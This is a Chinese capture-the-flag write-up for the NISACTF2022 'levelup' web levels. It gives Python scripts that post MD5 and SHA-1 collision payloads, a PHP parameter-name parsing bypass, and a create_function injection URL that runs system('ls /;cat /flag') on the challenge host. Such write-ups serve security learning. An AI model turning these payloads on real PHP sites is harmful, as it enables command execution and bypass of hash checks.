NISACTF2022-levelup-wp

题目链接

level 1

1
/robots.txt	//源码有提示

level 2

md5碰撞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import requests
post_data = {
    "array1": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
                b'\xfe\x34\x04\xcf\x03\x65\x9e\x74\x4f\x85\x34\xc0\x0f\xfb'
                b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
                b'\x15\xdc\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
                b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef',
    "array2": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
            b'\xfe\x34\x04\xcf\x03\x65\x9e\x70\x4f\x85\x34\xc0\x0f\xfb'
            b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
            b'\x15\x5c\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
            b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
response = requests.post("http://node3.anna.nssctf.cn:28905/level_2_1s_h3re.php", data=post_data)
print(response.text)

level 3

sha1碰撞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
import requests
post_data = {
"array1": 
b'\x99\x04\x0d\x04\x7f\xe8\x17\x80\x01\x20\x00\xff\x4b\x65\x79\x20'
b'\x69\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x20\x61\x20\x63\x6f\x6c'
b'\x6c\x69\x73\x69\x6f\x6e\x21\x20\x49\x74\x27\x73\x20\x61\x20\x74'
b'\x72\x61\x70\x21\x79\xc6\x1a\xf0\xaf\xcc\x05\x45\x15\xd9\x27\x4e'
b'\x73\x07\x62\x4b\x1d\xc7\xfb\x23\x98\x8b\xb8\xde\x8b\x57\x5d\xba'
b'\x7b\x9e\xab\x31\xc1\x67\x4b\x6d\x97\x43\x78\xa8\x27\x73\x2f\xf5'
b'\x85\x1c\x76\xa2\xe6\x07\x72\xb5\xa4\x7c\xe1\xea\xc4\x0b\xb9\x93'
b'\xc1\x2d\x8c\x70\xe2\x4a\x4f\x8d\x5f\xcd\xed\xc1\xb3\x2c\x9c\xf1'
b'\x9e\x31\xaf\x24\x29\x75\x9d\x42\xe4\xdf\xdb\x31\x71\x9f\x58\x76'
b'\x23\xee\x55\x29\x39\xb6\xdc\xdc\x45\x9f\xca\x53\x55\x3b\x70\xf8'
b'\x7e\xde\x30\xa2\x47\xea\x3a\xf6\xc7\x59\xa2\xf2\x0b\x32\x0d\x76'
b'\x0d\xb6\x4f\xf4\x79\x08\x4f\xd3\xcc\xb3\xcd\xd4\x83\x62\xd9\x6a'
b'\x9c\x43\x06\x17\xca\xff\x6c\x36\xc6\x37\xe5\x3f\xde\x28\x41\x7f'
b'\x62\x6f\xec\x54\xed\x79\x43\xa4\x6e\x5f\x57\x30\xf2\xbb\x38\xfb'
b'\x1d\xf6\xe0\x09\x00\x10\xd0\x0e\x24\xad\x78\xbf\x92\x64\x19\x93'
b'\x60\x8e\x8d\x15\x8a\x78\x9f\x34\xc4\x6f\xe1\xe6\x02\x7f\x35\xa4'
b'\xcb\xfb\x82\x70\x76\xc5\x0e\xca\x0e\x8b\x7c\xca\x69\xbb\x2c\x2b'
b'\x79\x02\x59\xf9\xbf\x95\x70\xdd\x8d\x44\x37\xa3\x11\x5f\xaf\xf7'
b'\xc3\xca\xc0\x9a\xd2\x52\x66\x05\x5c\x27\x10\x47\x55\x17\x8e\xae'
b'\xff\x82\x5a\x2c\xaa\x2a\xcf\xb5\xde\x64\xce\x76\x41\xdc\x59\xa5'
b'\x41\xa9\xfc\x9c\x75\x67\x56\xe2\xe2\x3d\xc7\x13\xc8\xc2\x4c\x97'
b'\x90\xaa\x6b\x0e\x38\xa7\xf5\x5f\x14\x45\x2a\x1c\xa2\x85\x0d\xdd'
b'\x95\x62\xfd\x9a\x18\xad\x42\x49\x6a\xa9\x70\x08\xf7\x46\x72\xf6'
b'\x8e\xf4\x61\xeb\x88\xb0\x99\x33\xd6\x26\xb4\xf9\x18\x74\x9c\xc0'
b'\x27\xfd\xdd\x6c\x42\x5f\xc4\x21\x68\x35\xd0\x13\x4d\x15\x28\x5b'
b'\xab\x2c\xb7\x84\xa4\xf7\xcb\xb4\xfb\x51\x4d\x4b\xf0\xf6\x23\x7c'
b'\xf0\x0a\x9e\x9f\x13\x2b\x9a\x06\x6e\x6f\xd1\x7f\x6c\x42\x98\x74'
b'\x78\x58\x6f\xf6\x51\xaf\x96\x74\x7f\xb4\x26\xb9\x87\x2b\x9a\x88'
b'\xe4\x06\x3f\x59\xbb\x33\x4c\xc0\x06\x50\xf8\x3a\x80\xc4\x27\x51'
b'\xb7\x19\x74\xd3\x00\xfc\x28\x19\xa2\xe8\xf1\xe3\x2c\x1b\x51\xcb'
b'\x18\xe6\xbf\xc4\xdb\x9b\xae\xf6\x75\xd4\xaa\xf5\xb1\x57\x4a\x04'
b'\x7f\x8f\x6d\xd2\xec\x15\x3a\x93\x41\x22\x93\x97\x4d\x92\x8f\x88'
b'\xce\xd9\x36\x3c\xfe\xf9\x7c\xe2\xe7\x42\xbf\x34\xc9\x6b\x8e\xf3'
b'\x87\x56\x76\xfe\xa5\xcc\xa8\xe5\xf7\xde\xa0\xba\xb2\x41\x3d\x4d'
b'\xe0\x0e\xe7\x1e\xe0\x1f\x16\x2b\xdb\x6d\x1e\xaf\xd9\x25\xe6\xae'
b'\xba\xae\x6a\x35\x4e\xf1\x7c\xf2\x05\xa4\x04\xfb\xdb\x12\xfc\x45'
b'\x4d\x41\xfd\xd9\x5c\xf2\x45\x96\x64\xa2\xad\x03\x2d\x1d\xa6\x0a'
b'\x73\x26\x40\x75\xd7\xf1\xe0\xd6\xc1\x40\x3a\xe7\xa0\xd8\x61\xdf'
b'\x3f\xe5\x70\x71\x88\xdd\x5e\x07\xd1\x58\x9b\x9f\x8b\x66\x30\x55'
b'\x3f\x8f\xc3\x52\xb3\xe0\xc2\x7d\xa8\x0b\xdd\xba\x4c\x64\x02\x0d',

"array2": 
b'\x99\x03\x0d\x04\x7f\xe8\x17\x80\x01\x18\x00\xff\x50\x72\x61\x63'
b'\x74\x69\x63\x61\x6c\x20\x53\x48\x41\x2d\x31\x20\x63\x68\x6f\x73'
b'\x65\x6e\x2d\x70\x72\x65\x66\x69\x78\x20\x63\x6f\x6c\x6c\x69\x73'
b'\x69\x6f\x6e\x21\x1d\x27\x6c\x6b\xa6\x61\xe1\x04\x0e\x1f\x7d\x76'
b'\x7f\x07\x62\x49\xdd\xc7\xfb\x33\x2c\x8b\xb8\xc2\xb7\x57\x5d\xbe'
b'\xc7\x9e\xab\x2b\xe1\x67\x4b\x7d\xb3\x43\x78\xb4\xcb\x73\x2f\xe1'
b'\x89\x1c\x76\xa0\x26\x07\x72\xa5\x10\x7c\xe1\xf6\xe8\x0b\xb9\x97'
b'\x7d\x2d\x8c\x68\x52\x4a\x4f\x9d\x5f\xcd\xed\xcd\x0b\x2c\x9c\xe1'
b'\x92\x31\xaf\x26\xe9\x75\x9d\x52\x50\xdf\xdb\x2d\x4d\x9f\x58\x72'
b'\x9f\xee\x55\x33\x19\xb6\xdc\xcc\x61\x9f\xca\x4f\xb9\x3b\x70\xec'
b'\x72\xde\x30\xa0\x87\xea\x3a\xe6\x73\x59\xa2\xee\x27\x32\x0d\x72'
b'\xb1\xb6\x4f\xec\xc9\x08\x4f\xc3\xcc\xb3\xcd\xd8\x3b\x62\xd9\x7a'
b'\x90\x43\x06\x15\x0a\xff\x6c\x26\x72\x37\xe5\x23\xe2\x28\x41\x7b'
b'\xde\x6f\xec\x4e\xcd\x79\x43\xb4\x4a\x5f\x57\x2c\x1e\xbb\x38\xef'
b'\x11\xf6\xe0\x0b\xc0\x10\xd0\x1e\x90\xad\x78\xa3\xbe\x64\x19\x97'
b'\xdc\x8e\x8d\x0d\x3a\x78\x9f\x24\xc4\x6f\xe1\xea\xba\x7f\x35\xb4'
b'\xc7\xfb\x82\x72\xb6\xc5\x0e\xda\xba\x8b\x7c\xd6\x55\xbb\x2c\x2f'
b'\xc5\x02\x59\xe3\x9f\x95\x70\xcd\xa9\x44\x37\xbf\xfd\x5f\xaf\xe3'
b'\xcf\xca\xc0\x98\x12\x52\x66\x15\xe8\x27\x10\x5b\x79\x17\x8e\xaa'
b'\x43\x82\x5a\x34\x1a\x2a\xcf\xa5\xde\x64\xce\x7a\xf9\xdc\x59\xb5'
b'\x4d\xa9\xfc\x9e\xb5\x67\x56\xf2\x56\x3d\xc7\x0f\xf4\xc2\x4c\x93'
b'\x2c\xaa\x6b\x14\x18\xa7\xf5\x4f\x30\x45\x2a\x00\x4e\x85\x0d\xc9'
b'\x99\x62\xfd\x98\xd8\xad\x42\x59\xde\xa9\x70\x14\xdb\x46\x72\xf2'
b'\x32\xf4\x61\xf3\x38\xb0\x99\x23\xd6\x26\xb4\xf5\xa0\x74\x9c\xd0'
b'\x2b\xfd\xdd\x6e\x82\x5f\xc4\x31\xdc\x35\xd0\x0f\x71\x15\x28\x5f'
b'\x17\x2c\xb7\x9e\x84\xf7\xcb\xa4\xdf\x51\x4d\x57\x1c\xf6\x23\x68'
b'\xfc\x0a\x9e\x9d\xd3\x2b\x9a\x16\xda\x6f\xd1\x63\x40\x42\x98\x70'
b'\xc4\x58\x6f\xee\xe1\xaf\x96\x64\x7f\xb4\x26\xb5\x3f\x2b\x9a\x98'
b'\xe8\x06\x3f\x5b\x7b\x33\x4c\xd0\xb2\x50\xf8\x26\xbc\xc4\x27\x55'
b'\x0b\x19\x74\xc9\x20\xfc\x28\x09\x86\xe8\xf1\xff\xc0\x1b\x51\xdf'
b'\x14\xe6\xbf\xc6\x1b\x9b\xae\xe6\xc1\xd4\xaa\xe9\x9d\x57\x4a\x00'
b'\xc3\x8f\x6d\xca\x5c\x15\x3a\x83\x41\x22\x93\x9b\xf5\x92\x8f\x98'
b'\xc2\xd9\x36\x3e\x3e\xf9\x7c\xf2\x53\x42\xbf\x28\xf5\x6b\x8e\xf7'
b'\x3b\x56\x76\xe4\x85\xcc\xa8\xf5\xd3\xde\xa0\xa6\x5e\x41\x3d\x59'
b'\xec\x0e\xe7\x1c\x20\x1f\x16\x3b\x6f\x6d\x1e\xb3\xf5\x25\xe6\xaa'
b'\x06\xae\x6a\x2d\xfe\xf1\x7c\xe2\x05\xa4\x04\xf7\x63\x12\xfc\x55'
b'\x41\x41\xfd\xdb\x9c\xf2\x45\x86\xd0\xa2\xad\x1f\x11\x1d\xa6\x0e'
b'\xcf\x26\x40\x6f\xf7\xf1\xe0\xc6\xe5\x40\x3a\xfb\x4c\xd8\x61\xcb'
b'\x33\xe5\x70\x73\x48\xdd\x5e\x17\x65\x58\x9b\x83\xa7\x66\x30\x51'
b'\x83\x8f\xc3\x4a\x03\xe0\xc2\x6d\xa8\x0b\xdd\xb6\xf4\x64\x02\x1d'}
response = requests.post("http://node3.anna.nssctf.cn:28905/Level___3.php", data=post_data)
print(response.text)

level 4

php的变量解析绕过, php会把请求参数中的非法字符转为下划线

1
/level_level_4.php?NI+SA+=txw4ever

level 5

$a('',$b);想到应该是用create_function,但是不能以字母数字开头,前加\

1
/55_5_55.php?a=\create_function&b=}system('ls /;cat /flag');//
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP